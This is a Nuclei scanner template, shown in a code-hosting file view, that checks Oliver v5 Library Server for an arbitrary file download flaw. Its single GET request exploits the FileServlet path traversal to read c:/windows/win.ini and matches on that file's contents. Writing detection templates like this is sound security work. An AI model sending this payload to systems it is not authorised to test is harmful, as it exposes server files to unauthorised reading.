nuclei-templates/vulnerabilities/other/oliver-library-lfi.yaml

26 lines
776 B
YAML
Raw Normal View History

id: oliver-library-lfi
info:
name: Oliver Library Server v5 - Arbitrary File Download
author: gy741
severity: high
description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
reference:
- https://www.exploit-db.com/exploits/50599
- https://www.softlinkint.com/product/oliver/
tags: windows,lfi,oliver
requests:
- method: GET
path:
- "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and